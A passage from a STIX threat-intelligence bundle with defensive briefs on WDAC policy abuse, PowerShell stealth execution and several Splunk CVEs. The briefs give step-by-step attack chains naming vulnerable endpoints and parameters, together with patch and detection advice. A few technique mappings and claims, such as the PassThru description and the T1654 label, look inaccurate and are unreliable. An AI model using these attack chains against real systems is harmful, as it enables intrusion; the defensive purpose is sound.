      "description": "## Overview\n\nThis threat brief details a technique where attackers create or modify Windows Defender Application Control (WDAC) policies from non-standard or unauthorized processes. WDAC is a security feature in Windows designed to control which applications are allowed to run on a system. While legitimate processes (like PowerShell, Configuration Manager, or WDAC Wizard) typically manage these policies, an adversary gaining initial access could abuse this mechanism. By crafting and deploying a malicious WDAC policy, an attacker can effectively disable or bypass existing security controls, such as EDR or AV solutions, by whitelisting their own malicious payloads and blacklisting security agent components. This allows the attacker to execute their tools unimpeded, significantly impairing the victim's ability to detect and respond to ongoing intrusions. The detection focuses on file creation events in the `C:\\Windows\\System32\\CodeIntegrity\\` directory by processes not typically associated with WDAC policy management.\n\n## Impact\n\nSuccessful exploitation of this technique can lead to a significant degradation of endpoint security posture. By weaponizing WDAC policies, attackers can bypass security software, allowing for unimpeded execution of malware, credential theft, data exfiltration, or further lateral movement. The primary impact is the loss of visibility and control for security teams, rendering installed EDR/AV solutions ineffective and increasing the risk of widespread compromise or data breaches without immediate detection.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Potentially Suspicious WDAC Policy File Creation\" provided in this brief to your SIEM and tune for your environment to detect unauthorized WDAC policy modifications.\n*   Regularly review file creation events in `C:\\Windows\\System32\\CodeIntegrity\\` for anomalies not covered by the `filter_main_*` exclusions in the provided Sigma rule.\n*   Implement strong access controls and principle of least privilege to prevent unauthorized processes from writing to critical system directories.\n*   Monitor for any unexpected changes to WDAC policies via Group Policy or other management tools, especially those that block security software.\n",
      "published": "2026-07-03T13:49:54Z",
      "labels": [
        "defense-impairment",
        "wdac",
        "application-control",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy"
        },
        {
          "source_name": "reference",
          "url": "https://beierle.win/2024-12-20-Weaponizing-WDAC-Killing-the-Dreams-of-EDR/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/appcontrol-deployment-guide"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-script"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-with-memcm"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9dbbbf19-4ac9-515a-8772-cb1f59954346",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--09525be3-179b-5def-b2ec-506a16a72a49",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--09525be3-179b-5def-b2ec-506a16a72a49",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious PowerShell Start-Process with PassThru for Stealth Execution",
      "description": "## Overview\n\nThis brief describes a PowerShell defense evasion technique observed where adversaries utilize the `Start-Process` cmdlet with the `-PassThru` parameter to execute commands or programs in a hidden manner. This method allows processes to be launched in the background without a visible window or console, making their execution less conspicuous to users and potentially evading detection by security monitoring solutions that rely on visible process creation. The technique is often employed as part of the Masquerading tactic (ATT\u0026CK T1036.003), enabling attackers to blend malicious activity with legitimate system operations or to maintain persistence. The detection rule for this behavior was last modified in May 2026, indicating ongoing relevance and potential use in recent campaigns. This technique bypasses traditional process monitoring by creating processes that are not directly children of the calling PowerShell process, making attribution more challenging.\n\n## Impact\n\nSuccessful exploitation of this technique primarily enables defense evasion and persistence, allowing attackers to establish covert footholds within compromised systems. By launching malicious processes in a non-interactive, background state, adversaries can execute payloads, establish command and control, or perform data exfiltration without alerting the user. The impact could range from unauthorized access to sensitive data and intellectual property to the deployment of ransomware or other destructive malware, leading to significant financial and operational disruption. Without proper logging and detection, this stealthy execution can prolong the dwell time of an attacker and complicate incident response efforts, making it harder to identify the initial compromise vector and scope of impact.\n\n## Recommendation\n\n*   Enable PowerShell Script Block Logging on all Windows endpoints to ensure the `ScriptBlockText` field is captured for detection.\n*   Deploy the \"Suspicious PowerShell Start-Process PassThru\" Sigma rule in this brief to your SIEM and tune for your environment.\n",
      "published": "2026-07-03T13:49:11Z",
      "labels": [
        "powershell",
        "defense-evasion",
        "stealth",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/start-process?view=powershell-7.6"
        }
      ],
      "confidence": 60
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cfec952c-5bb6-5ecf-b5fe-f6bc63fc244d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Apple Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Apple security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Apple's July 2026 security updates.\n",
      "published": "2026-07-03T13:48:34Z",
      "labels": [
        "roundup"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/macos/persistence_suspicious_launch_agent_or_launch_daemon.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/macos/lateral_movement_remote_ssh_login_enabled.toml"
        },
        {
          "source_name": "reference",
          "url": "https://www.reddit.com/r/blueteamsec/comments/1un3vp2/pamstealer_a_rustbased_macos_infostealer_that/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1210",
          "url": "https://attack.mitre.org/techniques/T1210"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ec710d3f-5b2b-505c-b80b-178d82a98cb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--21347f7a-4a52-5979-8304-461365fd2655",
      "target_ref": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--21347f7a-4a52-5979-8304-461365fd2655",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Splunk Code Injection via Custom Dashboard Leading to RCE (CVE-2022-43571)",
      "description": "## Overview\n\nThis brief details CVE-2022-43571, a critical code injection vulnerability affecting Splunk Enterprise versions prior to 8.2.9, 8.1.12, and 9.0.2, as well as Splunk Cloud. An authenticated user can leverage this flaw by injecting arbitrary code into the dashboard PDF generation component, enabling remote code execution (RCE) on the underlying Splunk server. This vulnerability, initially identified in late 2022, can lead to complete compromise of the Splunk environment, unauthorized access, and arbitrary command execution. While the original detection logic for this vulnerability has been deprecated due to the affected versions reaching End of Life (EOL) and the detection's imperfect capture of malicious activity, the vulnerability itself remains a significant risk for any unpatched or unsupported Splunk instances.\n\n## Attack Chain\n\n1.  **Initial Access**: An authenticated attacker gains access to the Splunk Web User Interface (UI), potentially via compromised or stolen credentials.\n2.  **Interaction**: The attacker navigates to a Splunk dashboard or a saved search configured to allow PDF exports.\n3.  **Malicious Input**: The attacker crafts a specific HTTP request targeting the PDF generation endpoint (e.g., `/en-US/splunkd/__raw/services/pdfgen/render`) and injects malicious code into a vulnerable input parameter, such as the `file=export` parameter.\n4.  **Code Injection**: The Splunk server's dashboard PDF generation component processes the attacker's input without adequate sanitization, resulting in the injection of the malicious code into the server-side process.\n5.  **Remote Execution**: The injected code is executed on the underlying server with the privileges of the Splunk process, successfully achieving remote code execution (RCE).\n6.  **System Compromise**: With RCE, the attacker gains full control over the Splunk host, enabling them to execute arbitrary commands, exfiltrate sensitive data, or establish further persistence within the network.\n\n## Impact\n\nSuccessful exploitation of CVE-2022-43571 allows an attacker to achieve remote code execution on the Splunk instance, leading to a complete compromise of the Splunk environment. This could result in unauthorized access to sensitive data indexed by Splunk, arbitrary command execution on the host server, and the ability to pivot to other systems within the compromised network. While the affected Splunk versions (8.1.12, 8.2.9, and 9.0.2) have reached End of Life (EOL) between 2023 and 2024, organizations still running these unsupported versions remain at severe risk.\n\n## Recommendation\n\n*   Patch CVE-2022-43571 immediately by upgrading Splunk Enterprise instances beyond versions 8.2.9, 8.1.12, and 9.0.2.\n*   Ensure Splunk Cloud deployments are updated to the latest secure versions.\n*   Monitor Splunk's `_internal` index for suspicious activity, specifically related to `uri_path=*/data/ui/views/*` or `uri_path=*saved/searches/*` combined with unusual parameters or error codes (e.g., `status` codes in the 4xx or 5xx range) as indicated in the original analytic logic.\n",
      "published": "2026-07-03T13:42:50Z",
      "labels": [
        "splunk",
        "vulnerability",
        "rce",
        "code-injection",
        "application-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.splunk.com/en_us/product-security.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/deprecated/splunk_code_injection_via_custom_dashboard_leading_to_rce.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Drive-by Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1189",
          "url": "https://attack.mitre.org/techniques/T1189"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a8e52d27-d717-515e-bc92-1c16fbf6b1fa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--aae136bb-5654-54cc-9d8d-455e519b9879",
      "target_ref": "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--aae136bb-5654-54cc-9d8d-455e519b9879",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Splunk XSS Privilege Escalation via Custom URLs in Dashboard (CVE-2024-36992)",
      "description": "## Overview\n\nA critical cross-site scripting (XSS) vulnerability, identified as CVE-2024-36992, affects Splunk Enterprise and Splunk Cloud Platform. This flaw allows attackers to achieve privilege escalation by exploiting custom URLs within Splunk dashboards. Malicious POST requests targeting the `splunk_internal_metrics/data/ui/views` endpoint can inject and execute arbitrary JavaScript. Upon execution, typically when a privileged user views the compromised dashboard, the XSS payload facilitates the creation of new user accounts with elevated access permissions on the Splunk server. This vulnerability presents a significant risk, enabling unauthorized administrative control and potential data exfiltration or manipulation within the Splunk environment. Defenders should prioritize patching and monitoring for the specific POST requests and subsequent user creation events.\n\n## Attack Chain\n\n1.  **Initial Access / Vulnerability Exploitation (T1189):** An attacker, potentially with low-privileged access, injects malicious JavaScript into a custom URL field within a Splunk dashboard, exploiting the CVE-2024-36992 XSS vulnerability.\n2.  **Payload Delivery (T1059.004):** The crafted XSS payload is delivered via a POST request to the internal Splunk endpoint `/splunk_internal_metrics/data/ui/views`, embedding the malicious script within the dashboard configuration.\n3.  **Triggering (T1203):** A privileged Splunk user (e.g., an administrator) accesses or views the compromised dashboard containing the malicious custom URL.\n4.  **Client-Side Execution (T1059.004):** The embedded JavaScript executes in the context of the privileged user's browser, leveraging their authenticated session within the Splunk interface.\n5.  **Privilege Escalation Action (T1068 / T1098):** The executed script issues commands to the Splunk API, such as `audittrail` actions, to create a new user account with administrative or other high-level privileges.\n6.  **Persistence / Unauthorized Account Creation (T1136.001):** A new user account with elevated permissions is successfully created on the Splunk server, granting the attacker persistent access and control.\n7.  **Post-Exploitation (TA0011):** The attacker utilizes the newly created privileged account to perform further malicious activities, including data exfiltration, system configuration changes, or deployment of additional implants.\n\n## Impact\n\nThe successful exploitation of CVE-2024-36992 leads directly to privilege escalation within the Splunk environment. This enables unauthorized attackers to create new user accounts with administrative or other high-level privileges, effectively gaining full control over the Splunk instance. Such compromise can result in sensitive data exfiltration, manipulation of critical log data, disruption of Splunk services, or the use of the Splunk server as a pivot point for further attacks against integrated systems. While the number of victims is not specified, all organizations utilizing affected versions of Splunk Enterprise and Splunk Cloud Platform are at risk of severe data integrity and confidentiality breaches.\n\n## Recommendation\n\n*   Patch CVE-2024-36992 immediately by applying the latest security updates provided by Splunk, available through the official advisory at `https://advisory.splunk.com/`.\n*   Deploy the provided Sigma rule \"Detect POST Requests to Splunk UI View Endpoint (CVE-2024-36992)\" to identify suspicious activity targeting the `splunk_internal_metrics/data/ui/views` endpoint.\n*   Deploy the provided Sigma rule \"Detect High-Privilege Splunk User Creation (CVE-2024-36992 Context)\" to monitor for unauthorized administrative user account creation.\n*   Ensure full logging is enabled for Splunk's internal indexes, specifically `_audit` and `_internal`, as these are critical log sources for detecting this threat.\n",
      "published": "2026-07-03T13:41:47Z",
      "labels": [
        "xss",
        "privilege-escalation",
        "splunk",
        "cve",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--e45ab8fc-efb0-5498-ad7e-0b8b432b8de2"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://advisory.splunk.com/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/application/splunk_xss_privilege_escalation_via_custom_urls_in_dashboard.yml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Account Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1087",
          "url": "https://attack.mitre.org/techniques/T1087"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3247e33d-97c0-5930-9b3f-23b154f75278",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--87f090ae-1abf-5171-8e3c-a3db375305ba",
      "target_ref": "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--87f090ae-1abf-5171-8e3c-a3db375305ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Splunk User Enumeration Attempt Detection",
      "description": "## Overview\n\nThis brief describes detection logic aimed at identifying attempts to enumerate valid usernames within Splunk Enterprise or Splunk Cloud environments. Threat actors initiate numerous failed authentication attempts from a single source IP address against a Splunk instance's login interface. By observing the responses (e.g., specific error messages or timing differences), attackers can discern which usernames are valid, even if the password is incorrect. This activity is a critical precursor to more advanced attacks such as password spraying or brute-force credential attacks, as outlined in the linked Splunk security content. While the detection specifically targets user enumeration, it can also help identify broader credential-based attack campaigns. The behavior is observable within Splunk's internal `_audit` index, which records authentication events. A related security advisory for Splunk's login page, CVE-2021-33845, pertains to a Cross-site Scripting vulnerability, though this brief's detection focuses on enumeration behavior rather than direct exploitation of that specific CVE.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Target Identification**: Attacker identifies a publicly accessible Splunk instance via open-source intelligence or scanning.\n2.  **Initial Enumeration Attempt**: Attacker initiates multiple authentication attempts using common or guessed usernames (e.g., `admin`, `splunkadmin`, `user1`) combined with incorrect passwords.\n3.  **Failed Authentication Logging**: The Splunk instance processes these login attempts and logs failures (action=login, status=failure) in its internal `_audit` index.\n4.  **Response Analysis**: Attacker analyzes the HTTP responses or error messages from the Splunk login interface, or relies on the sheer volume of failed attempts, to distinguish between invalid usernames and valid usernames with incorrect passwords.\n5.  **Username List Generation**: A list of confirmed valid Splunk usernames is compiled based on the enumeration results.\n6.  **Credential-Based Attack Preparation**: The attacker uses the gathered valid usernames for subsequent credential-based attacks such as password spraying or brute-forcing.\n7.  **Initial Access Attempt**: Attacker attempts to log into the Splunk instance using the valid usernames and compromised or guessed passwords.\n8.  **Unauthorized Access \u0026 Impact**: Successful login grants unauthorized access to the Splunk environment, potentially leading to sensitive data exfiltration, dashboard manipulation, or further compromise of integrated systems.\n\n## Impact\n\nSuccessful user enumeration provides threat actors with a critical piece of information—valid usernames—that significantly streamlines subsequent credential-based attacks. If these attacks succeed, they can lead to unauthorized access to the Splunk environment. This unauthorized access can result in the exposure, modification, or deletion of sensitive enterprise data, compromise of security monitoring capabilities, and serve as a pivot point for lateral movement into other systems. The integrity and confidentiality of data managed or monitored by Splunk instances are at severe risk.\n\n## Recommendation\n\n*   Review the `_audit` index for `action=login` events with `status=failure` that show a high count from a single `src` IP address targeting different `user` accounts, indicating potential user enumeration attempts.\n*   Implement strong account lockout policies within Splunk to deter brute-force and password spraying attacks that leverage enumerated usernames.\n*   Ensure multi-factor authentication (MFA) is enforced for all Splunk user accounts, especially those with administrative privileges.\n*   Monitor for high volumes of failed login attempts against your Splunk infrastructure and investigate their source and targeted accounts.\n*   Regularly rotate credentials for Splunk accounts and enforce complex password requirements.\n",
      "published": "2026-07-03T13:40:29Z",
      "labels": [
        "user-enumeration",
        "splunk",
        "authentication",
        "application"
      ],
      "object_refs": [
        "attack-pattern--01b0e09b-1506-5d2d-8ffa-f7854bbc1154"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/application/splunk_user_enumeration_attempt.yml"
        },
        {
          "source_name": "reference",
          "url": "https://www.splunk.com/en_us/product-security/announcements/svd-2022-0502.html"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1210",
          "url": "https://attack.mitre.org/techniques/T1210"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8a91054f-85ed-50ce-81d6-06707cfd13ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--74932dbb-7a8b-530e-95d4-e8bc95473aed",
      "target_ref": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--74932dbb-7a8b-530e-95d4-e8bc95473aed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Splunk RCE via User XSLT Exploitation (CVE-2023-46214)",
      "description": "## Overview\n\nAttackers are targeting Splunk Enterprise and Splunk Cloud Platform instances by exploiting CVE-2023-46214, an issue related to the improper handling of user-supplied Extensible Stylesheet Language Transformations (XSLT). This vulnerability, affecting Splunk Enterprise versions prior to 9.0.7 and 9.1.2, and Splunk Cloud Platform versions prior to 9.0.2308 and 9.1.2308, allows an authenticated user to achieve remote code execution on the underlying Splunk server. The attack typically involves crafting a malicious XSLT payload and submitting it through an interface that processes user-controlled XSLT. Successful exploitation can grant threat actors full control over the Splunk instance, enabling unauthorized data access, system modification, and further lateral movement within the compromised network. Defenders should prioritize patching and monitoring for indicators of attempted exploitation in their `splunkd_ui` logs.\n\n## Attack Chain\n\n1.  **Initial Access / Account Compromise**: An attacker gains access to a valid Splunk user account or identifies a publicly accessible endpoint that processes user-supplied XSLT without proper sanitization.\n2.  **Malicious XSLT Crafting**: The attacker develops a specialized XSLT file containing malicious code designed to exploit CVE-2023-46214, targeting the Splunk server's underlying operating system.\n3.  **XSLT Submission**: The malicious XSLT payload is submitted to the vulnerable Splunk instance, typically through an API endpoint or UI feature that accepts XSLT definitions.\n4.  **Vulnerability Trigger**: The Splunk instance attempts to process the user-supplied XSLT, which triggers the remote code execution vulnerability (CVE-2023-46214).\n5.  **Code Execution**: The malicious XSLT causes the Splunk server to execute arbitrary commands under the privileges of the Splunk daemon.\n6.  **Post-Exploitation Actions**: The attacker runs commands on the Splunk server, such as creating new user accounts, deploying backdoors, or executing reconnaissance tools.\n7.  **Impact**: The attacker proceeds with objectives such as data exfiltration from Splunk indexes, system compromise, or using the Splunk server as a pivot point for lateral movement.\n\n## Impact\n\nSuccessful exploitation of CVE-2023-46214 leads to critical consequences for affected organizations. Attackers can achieve full system compromise of the Splunk server, gaining complete control over the application and the underlying host. This allows for unauthorized access to sensitive data stored within Splunk indexes, potentially exfiltrating proprietary information, customer data, or security logs. Furthermore, the compromised Splunk instance can be used as a beachhead for lateral movement across the network, enabling broader attacks and impacting multiple systems. The number of potential victims is significant, as Splunk is widely deployed across various sectors for security and operational intelligence.\n\n## Recommendation\n\n*   Immediately patch all Splunk Enterprise instances to versions 9.0.7 or later, or 9.1.2 or later, and Splunk Cloud Platform instances to versions 9.0.2308 or later, or 9.1.2308 or later to remediate CVE-2023-46214.\n*   Deploy the provided Sigma rule to your SIEM to detect potential exploitation attempts against Splunk instances.\n*   Review `splunkd_ui` logs for URIs containing `NO_BINARY_CHECK=1`, `input.path=*.xsl`, or `dispatch*.xsl` which could indicate ongoing or attempted exploitation of CVE-2023-46214.\n*   Investigate any detections of the provided Sigma rule, paying close attention to the `clientip`, `useragent`, and `status` fields to determine the nature and source of the activity.\n",
      "published": "2026-07-03T13:39:13Z",
      "labels": [
        "application",
        "rce",
        "splunk",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://advisory.splunk.com/advisories/SVD-2023-1104"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation of Remote Services",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1210",
          "url": "https://attack.mitre.org/techniques/T1210"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--16f93677-3080-502b-88f2-c16ffa27a736",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b9027968-2c2f-5b30-bbab-b6e13389a4fd",
      "target_ref": "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b9027968-2c2f-5b30-bbab-b6e13389a4fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Splunk RCE Through Arbitrary File Write to Windows System Root",
      "description": "## Overview\n\nThis threat concerns two critical vulnerabilities, CVE-2024-45731 and CVE-2024-45733, identified in Splunk Enterprise for Windows. Specifically, versions prior to 9.3.0, 9.2.3, and 9.1.6 are affected. These flaws enable a low-privileged user, even without 'admin' or 'power' Splunk roles, to write arbitrary files to the Windows system root directory, typically `C:\\Windows\\System32`, especially when Splunk is installed on a drive separate from the system root. This arbitrary file write, combined with an insecure session storage configuration, creates a path for remote code execution. Attackers can leverage this to upload and execute malicious code, leading to full system compromise. Detection engineers should prioritize identifying attempts to access vulnerable Splunk API endpoints and monitoring for unusual application creation events by unprivileged users.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains or already possesses a low-privileged user account on a Splunk Enterprise for Windows instance, lacking 'admin' or 'power' capabilities.\n2.  **Exploit Initiation**: The attacker sends a specially crafted HTTP POST request to the vulnerable Splunk API endpoint, `/search/apps/local/_new`.\n3.  **Arbitrary File Write (CVE-2024-45731)**: The successful request exploits CVE-2024-45731, allowing the attacker to write a malicious file (e.g., a DLL, executable, or script) to the Windows system root directory (`C:\\Windows\\System32`). This is particularly effective when Splunk is installed on a non-system drive.\n4.  **Code Upload via Insecure Session Storage (CVE-2024-45733)**: The attacker leverages CVE-2024-45733's insecure session storage configuration to facilitate the upload and persistent storage of the malicious code.\n5.  **Remote Code Execution**: The malicious file previously written to `C:\\Windows\\System32` is subsequently executed, leading to remote code execution on the underlying Splunk server.\n6.  **System Compromise**: With RCE, the attacker gains elevated privileges and full control over the compromised Splunk server, enabling further actions.\n7.  **Post-Exploitation Activities**: The attacker can now perform actions such as data exfiltration from Splunk's internal data, deploy additional malware for persistence, establish lateral movement, or disrupt Splunk operations.\n\n## Impact\n\nThe successful exploitation of these vulnerabilities leads to remote code execution on the affected Splunk Enterprise for Windows server. This grants the attacker full control over the compromised system, potentially with SYSTEM-level privileges if the Splunk service runs as such. Consequences include unauthorized access to sensitive data processed and stored by Splunk, complete compromise of the Splunk environment, and the ability to pivot to other systems within the network. This can result in significant data breaches, operational disruption, and the establishment of persistent backdoors, impacting the integrity and availability of critical security and operational data.\n\n## Recommendation\n\n*   **Patch Immediately**: Apply patches for CVE-2024-45731 and CVE-2024-45733 by upgrading Splunk Enterprise for Windows to versions 9.3.0, 9.2.3, 9.1.6, or newer as per Splunk's advisories.\n*   **Deploy Detection Rules**: Deploy the \"Detect CVE-2024-45731/CVE-2024-45733 Exploitation Attempt - Splunk Vulnerable Endpoint Access\" and \"Detect CVE-2024-45731/CVE-2024-45733 Exploitation - Splunk Low-Privilege App Creation Error\" Sigma rules to your SIEM.\n*   **Monitor Splunk Internal Logs**: Ensure that `_internal` index logs, specifically `splunkd_access` and `splunk_python` sourcetypes, are being collected and monitored for suspicious activity.\n*   **Investigate Detections**: Investigate any alerts generated by the provided Sigma rules for activities related to the `*/search/apps/local/_new` endpoint or privilege errors for low-privileged users.\n",
      "published": "2026-07-03T13:38:10Z",
      "labels": [
        "application-vulnerability",
        "rce",
        "file-write",
        "privilege-escalation",
        "splunk",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--a22493f4-a6a9-597f-b1fe-78e2c4e61694"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://advisory.splunk.com/advisories/SVD-2024-1001"
        },
        {
          "source_name": "reference",
          "url": "https://advisory.splunk.com/advisories/SVD-2024-1003"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c2f89670-b525-5d7c-8cff-4928a722d585",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal or Fabricate Tokens",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1654",
          "url": "https://attack.mitre.org/techniques/T1654"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56ff1482-b0a8-59b0-a1a3-1401ca1f820d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6b620811-1972-5745-8c4e-f282e3fdf86b",
      "target_ref": "attack-pattern--c2f89670-b525-5d7c-8cff-4928a722d585"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6b620811-1972-5745-8c4e-f282e3fdf86b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Splunk Authentication Token Exposure in Debug Logs (CVE-2024-29945)",
      "description": "## Overview\n\nThis brief details the implications of CVE-2024-29945, a vulnerability affecting Splunk Enterprise versions prior to 9.2.1, 9.1.4, and 9.0.9, as well as Splunk Cloud. The vulnerability causes sensitive authentication tokens, specifically JSON Web Tokens (JWTs), to be inadvertently logged in `splunkd` debug logs when the `JsonWebToken` component is configured for DEBUG level logging. If an attacker gains access to the underlying Splunk server's file system or its internal logs, these exposed tokens can be retrieved and reused to bypass authentication, gaining unauthorized access to the Splunk environment. This could lead to a range of malicious activities, including sensitive data exfiltration, privilege escalation within Splunk, and ultimately, a full compromise of the Splunk deployment. This exposure highlights the critical need for proper log configuration and timely patching to mitigate significant security risks.\n\n## Attack Chain\n\n1.  **Initial Access to Splunk Server/Logs:** An attacker first obtains unauthorized access to the Splunk server's underlying operating system or gains privileged access to Splunk's internal logging mechanisms (e.g., via a compromised administrative account or another vulnerability).\n2.  **Locate Debug Logs:** The attacker navigates to the Splunk internal log directories (e.g., `/opt/splunk/var/log/splunk/splunkd.log` on Linux) where 